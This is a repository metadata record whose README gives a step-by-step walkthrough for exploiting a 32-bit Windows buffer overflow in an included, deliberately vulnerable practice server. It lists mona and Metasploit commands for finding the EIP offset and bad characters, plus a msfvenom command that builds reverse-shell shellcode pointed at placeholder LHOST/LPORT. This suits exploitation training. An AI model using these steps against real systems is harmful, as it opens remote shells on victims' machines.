{"id":22647431,"url":"https://github.com/processust/exploitation-buffer-overflow-windows-32-bits-","last_synced_at":"2026-01-21T06:17:51.545Z","repository":{"id":82910880,"uuid":"502029493","full_name":"ProcessusT/Exploitation-Buffer-Overflow-Windows-32-bits-","owner":"ProcessusT","description":null,"archived":false,"fork":false,"pushed_at":"2022-06-10T12:12:00.000Z","size":27,"stargazers_count":2,"open_issues_count":0,"forks_count":2,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-03-25T08:01:37.156Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ProcessusT.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2022-06-10T12:09:42.000Z","updated_at":"2023-04-16T13:22:45.000Z","dependencies_parsed_at":null,"dependency_job_id":"7e6436b1-56cf-45f8-a069-1be7b914e305","html_url":"https://github.com/ProcessusT/Exploitation-Buffer-Overflow-Windows-32-bits-","commit_stats":null,"previous_names":["processust/exploitation-buffer-overflow-windows-32-bits-"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProcessusT%2FExploitation-Buffer-Overflow-Windows-32-bits-","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProcessusT%2FExploitation-Buffer-Overflow-Windows-32-bits-/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProcessusT%2FExploitation-Buffer-Overflow-Windows-32-bits-/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/reposit
ories/ProcessusT%2FExploitation-Buffer-Overflow-Windows-32-bits-/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ProcessusT","download_url":"https://codeload.github.com/ProcessusT/Exploitation-Buffer-Overflow-Windows-32-bits-/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248385360,"owners_count":21094871,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-12-09T07:33:36.841Z","updated_at":"2026-01-21T06:17:51.503Z","avatar_url":"https://github.com/ProcessusT.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Exploitation-Buffer-Overflow-Windows-32-bits\n\n\nFuzzing and exploitation scripts for a 32-bit buffer overflow on Windows\n\n\nThe files chatserver.exe and essfunc.dll are included to test the scripts (warning: the application is vulnerable)\n\n\nThe list of commands is available in the file COMMANDS.txt\n\n\n\n------------------------------------------------------------------------------------------\n\n\n\n# In Immunity, create a new workspace:\n!mona config -set workingfolder c:\\mona\\%p\n\n# Fuzz the binary with the fuzzing.py script to find the offset that triggers the segfault\n\n# Create a pattern with Metasploit to find the EIP offset\nmsf-pattern_create -l 2400\n\n# Take an exploit template and add our pattern as the payload to detect the segfault\n\n# Find the exact EIP offset at the time of the crash\n!mona findmsp -distance 2400\n\n# Update the offset in the exploit script and look for bad characters\n\n# Create a byte array of bad characters with mona\n!mona bytearray -b \"\\x00\"\n\n# Generate a string of bad characters and add it as the payload in the exploit script\n\n# Compare the bad characters against the ESP offset at the time of the crash\n!mona compare -f C:\\mona\\\u003cworkingfolder\u003e\\bytearray.bin -a \u003cESP offset\u003e\n\n# Generate a shellcode with Metasploit excluding the bad characters\nmsfvenom -p windows/shell_reverse_tcp LHOST=\u003clhost\u003e LPORT=\u003clport\u003e -b \"\u003cbadchars\u003e\" -f py\n\n# Find a jump-to-ESP offset with mona to execute the shellcode\n!mona jmp -r esp -cpb \"\u003cbadchars\u003e\"\n\n# Update the retn offset in the exploit script and add NOPs (16 is a reasonable number)\n\n# Start a local netcat listener and exploit :)\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fprocessust%2Fexploitation-buffer-overflow-windows-32-bits-","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fprocessust%2Fexploitation-buffer-overflow-windows-32-bits-","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fprocessust%2Fexploitation-buffer-overflow-windows-32-bits-/lists"}